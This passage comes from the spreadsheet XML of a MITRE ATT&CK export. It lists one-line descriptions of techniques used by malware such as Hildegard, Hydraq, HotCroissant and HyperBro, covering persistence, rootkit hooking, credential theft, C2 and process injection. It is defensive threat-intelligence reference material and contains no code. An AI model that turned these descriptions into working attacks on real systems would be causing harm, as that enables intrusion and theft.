    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) encrypts its configuration and payload.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--d13ea010-1b69-40d4-8d86-6fe2053f59d2</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) installs reboot persistence by adding itself to &lt;code&gt;/etc/rc.local&lt;/code&gt;.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--7ced0df2-1d05-40ea-986e-28692c028d92</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--8a8e30e6-c226-4739-87de-bd98c104d211</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--603d13cd-f6f7-4321-99db-3d3326878de4</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a script to automate tasks on the victim's machine and to assist in execution.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--a311f17e-9f17-4f4d-b316-d844c0a0f1d2</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>relationship--3c92afd0-50e1-42a7-97e0-6cec9b4f40cb</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load &lt;code&gt;oci.dll&lt;/code&gt; as a persistence mechanism.(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>relationship--1ad315e2-1693-427a-9a04-a613bd0e2f22</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) can upload files from compromised machines.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--dd82187a-7a40-45c3-a1d2-66d37bc6146e</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has the ability to download files to a compromised host.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--fb0206c4-ed10-4922-9935-cbb2c7462acd</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</si>
  <si>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</si>
  <si>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relationship--9a78f409-0f6b-41fd-a18f-f38366e4703e</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) supports peer connections.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--d7c40b1d-efe6-4869-9754-6494d45f51f1</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has been spread through spear phishing.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--0866161a-0753-44ab-bb14-a977654ddc68</t>
  </si>
  <si>
    <t xml:space="preserve">[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) </t>
  </si>
  <si>
    <t>relationship--aacb43b8-2d3a-40bc-9f7b-1acb5b2474f2</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) performs XOR encryption.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--2c29e6cf-a177-4578-bf1f-fd73ae254edd</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>relationship--8eac6ff8-7c47-4a81-94ad-e5844d2533f1</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has the ability to create a remote shell and run given commands.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>relationship--667c86bd-54f8-4602-a94a-054195de2808</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used an IRC channel for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--24f1177a-971a-457f-a9b6-36de5fc65d42</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used history -c to clear script shell logs.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--9bfac7bf-f5a7-4e43-99c6-fb1a86c0dbe3</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has queried the Cloud Instance Metadata API for cloud credentials.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--ced41648-7201-4eb8-aaae-c376e05af519</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--4428158e-cf07-49f0-8a9f-5cc767027e2a</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to search for kubelets and the kubelet API for additional running containers.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>relationship--457ee5f7-ec8f-4990-bfe0-8cf0a6e70b1f</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for SSH keys, Docker credentials, and Kubernetes service tokens.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--50a1a87a-31cf-4a98-96f6-276f35798185</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has decrypted ELF files with AES.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--ac5693ea-3d10-47bd-b91b-a65177dd5462</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified DNS resolvers to evade DNS monitoring tools.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--78b67e57-dba8-4dc5-b7c8-1ab9dfa9efe4</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to intercept shared library import functions.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--4a607e33-3970-4605-af5e-36be82bd142a</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool that can break out of containers. (Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>relationship--f47bdd6d-d8d4-450f-b6ff-30da690621b3</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool which exploits CVE-2019-5736.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>relationship--f7e5f676-46e1-4241-b0bb-fb32d891896a</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through an unsecure kubelet that allowed anonymous access to the victim environment.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--4c595f86-f839-44a3-81c8-8a1cab9f4293</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has deleted scripts after execution.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>relationship--33d66657-3e4c-430b-ae40-a9d310f39f13</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded additional scripts that build and run Monero cryptocurrency miners.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--cdd9ae58-bed9-4cce-ad46-d4e96a789ded</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has created a user named “monerodaemon”.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--c832fb66-57f5-40cb-94aa-ad788a4aad39</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has disguised itself as a known Linux process.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--718851be-6d2e-4073-86e1-d331198e2bc3</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to look for kubelets in the internal Kubernetes network.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--4c1c2160-0b1d-4bb9-be29-e0c6e0570a2d</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has encrypted an ELF file.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--e09fd624-7298-4bd0-8a38-90ba0eec6fbd</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for private keys in .ssh.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--2c50e260-05dd-4bb3-9d75-5a84e2757fa7</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--a0084acb-4ede-4dac-af86-857d5f381dac</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used xmrig to mine cryptocurrency.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--ae8d16f8-ba51-4b17-987b-5fbeedfc1780</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--8f5fdbbc-73b1-48a6-9916-67c0baa0f66e</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has packed ELF files into other binaries.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--5344358d-8558-44b1-910d-cbb6d1aae714</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has collected the host's OS, CPU, and memory information.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--810630f3-01fb-416d-992c-3f5a0390d962</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has started a monero service.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--eff691e3-85de-4b98-8534-da2333370856</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used shell scripts for execution.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--f90759fc-14cb-4f29-a2b6-221d6fb0e884</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded scripts from GitHub.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--81fcae09-a738-4922-9553-aad21e2b940b</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--c8a01e1c-dac0-4a47-bda3-3b5684bd3d47</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--1678d731-c556-4968-aab1-ae745015308f</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--45310a29-78b6-4863-ab0b-49fd53ef1809</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--911d7f27-a32e-45fb-a66b-e7b195023c43</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--fbc96b86-2c57-40b6-89f7-d7a755275a45</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to upload a file from the command and control (C2) server to the victim machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--967c2498-0f51-464f-b5e5-2a0539614033</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt; on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>relationship--7066827b-795c-447c-9c07-05765ed1e07b</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has encrypted strings with single-byte XOR and base64 encoded RC4.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--c12c331c-67dd-40be-b2ad-a198c0b92e78</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--a5720510-fadb-496d-97b5-99cdabb051ab</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--fa7381ff-f2b8-4878-a9a0-10a703c7a5dd</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--ee1b1aee-a635-4008-813d-fab125f0b0a5</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--92e19c14-504e-402f-b755-08358333cda0</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths&lt;/code&gt; registry key.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--d07460c8-0d13-4c25-81f7-56e5198f07c5</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--74f14668-7111-4f96-a307-4aac00d91cf4</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>relationship--30da2329-c7ee-4ac9-a38d-af79e6c1389c</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>relationship--e3542e4e-6c4d-468a-b11e-462e35dc33f6</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>relationship--f0f49935-c4e4-4322-8748-2129915950c7</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--c0f13745-074b-46ba-ae7a-03385ef79d31</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--a88e956c-6c71-47e1-b02c-d4c105542690</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can remotely open applications on the infected host with the &lt;code&gt;ShellExecuteA&lt;/code&gt; command.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--98fd9ed1-abf3-4e2f-b071-8aea2dc44a64</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can adjust token privileges.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--d68ff9e8-0766-49ea-8ddc-4308347c5bac</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can clear all system event logs.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--af009cfc-2b1f-4c4c-8712-0c13a2884d8e</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can read data from files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--5073b1b4-4018-4208-a46e-86a8358a6cee</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) connects to a predefined domain on port 443 to exfil gathered information.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--c5a0e330-ec5a-49cc-95b8-b7a5c49bd500</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--9c7a7eca-b91a-4974-bcf0-cfb77f105abd</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</si>
  <si>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</si>
  <si>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relationship--c7fee556-41c2-43bd-a732-e11ff34fb129</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can download files and additional malware components.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--5d914544-0a93-43ba-b890-1f4a4fa818e8</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</si>
  <si>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</si>
  <si>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relationship--541855dd-0249-4f63-8e95-0024f760484e</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses basic obfuscation in the form of spaghetti code.(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--5ef1c7d8-70bc-4634-b705-644f4d1db3b0</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor processes.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--a69bd4c0-ddaa-4dec-a35d-b067ae1d95fc</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--0825b101-deff-45cf-867c-af3ccb233744</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--a883e4c6-6a40-4660-9120-b2430099ccb6</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses svchost.exe to execute a malicious DLL included in a new service group.(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>relationship--1c0e8084-c8a5-4c8d-bac1-bfb7eb07b586</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can load and call DLL functions.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--15455c48-f71c-480d-91b8-e41f12608705</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) C2 traffic is encrypted using bitwise NOT and XOR operations.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--7feb6ceb-8a7c-45a9-902a-9b9c2c9a5e2c</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--4be87979-faf9-4a7a-998a-d1aa3fbf5a80</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--3c52b081-7521-4b73-8603-e6d05496db0c</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor services.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>relationship--935f8b6e-cd74-46c4-9a74-f763b4f13955</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates new services to establish persistence.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>relationship--72e36412-4427-479b-bc8e-e8d53e997587</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--3b4b4665-530f-4b8c-b090-48ae99eae905</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can unpack and decrypt its payload prior to execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--6cb89bfe-73f6-47d8-beb5-f8b2d66e0bfd</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to delete a specified file.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--dd385e5d-a066-4733-b448-b6baddb10083</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to download additional files.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--c96b0cbe-7523-4ee6-ae73-b6a8cba3ea44</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (&lt;code&gt;CreateProcessW&lt;/code&gt;) or script/file (&lt;code&gt;ShellExecuteW&lt;/code&gt;) via API.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--bc8cb83f-fc66-4c44-8d60-f6f4be4b4f41</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can be delivered encrypted to a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--bda95df4-bf1d-4a49-b847-cf4f3fd5f51c</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can run shellcode it injects into a newly created process.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--1e9c15dc-2ba7-421e-8d67-6b59e0c457c7</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to take screenshots.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--90ce2bf5-4fef-4d9d-b670-2a5ae8b7ba4d</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to start and stop a specified service.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--737788fa-f921-4147-9148-c39228f76e85</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to pack its payload.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--97784aa6-4d45-4698-9acd-918bb0502e32</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can list all services and their configurations.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--7e42e286-af96-4178-a30f-785ed3699659</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--4e37e10a-4832-4c5b-8164-f6f6eec8cacd</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use default credentials to connect to IPC$ shares on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--3f23a228-4817-44a0-9d08-210c23057b42</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can connect to the IPC$ share on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--82fa754d-3c73-415f-9bc3-3e6be5458856</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can enumerate all account names on a remote share.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--c5fef08a-e2ca-4bd1-880e-80fd90dc3d6a</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can add the name of its communication pipe to &lt;code&gt;HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes&lt;/code&gt;.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--91f7282f-e496-462d-9fd5-6cf4d0170e91</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use Windows API's &lt;code&gt;ConnectNamedPipe&lt;/code&gt; and &lt;code&gt;WNetAddConnection2&lt;/code&gt; to detect incoming connections and connect to remote shares.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--6cf502c8-58c4-41d5-abb1-f97492b1341c</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--9ce0b5a6-b0e8-45b3-9c5c-bbb6b891a216</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) uses the &lt;code&gt;certutil&lt;/code&gt; command to decode a payload file.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>relationship--566d783a-2d86-4b9a-8ca0-5013de5f7fb4</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>relationship--a0500766-a6ba-4672-b7fc-2a712cd0cfca</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>relationship--b1df64c9-782d-4452-8c4a-5ef933503c13</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) creates scheduled tasks to establish persistence.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>relationship--ee5e40d0-f72e-4e0b-8b10-cd5c2057cdc0</t>
  </si>
  <si>
    <t>S1022</t>
  </si>
  <si>
    <t>IceApple</t>
  </si>
  <si>
    <t>malware--dd889a55-fb2c-4ec7-8e9f-c399939a49e1</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can encrypt and compress files using Gzip prior to exfiltration.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--8a45b5fc-2d41-445b-b478-fbf5d1bc3c30</t>
  </si>
  <si>
    <t>28 June 2022</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use Base64 and "junk" JavaScript code to obfuscate information.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--1919b6a0-302d-4e7e-b15d-e64125b11187</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can harvest credentials from local and remote host registries.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--56faef01-6a5b-41a7-a7fe-888860750abe</t>
  </si>
  <si>
    <t>27 June 2022</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can collect files, passwords, and other data from a compromised host.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>relationship--6d3e0454-ffd1-46a7-9fcc-d4c8902707b7</t>
  </si>
  <si>
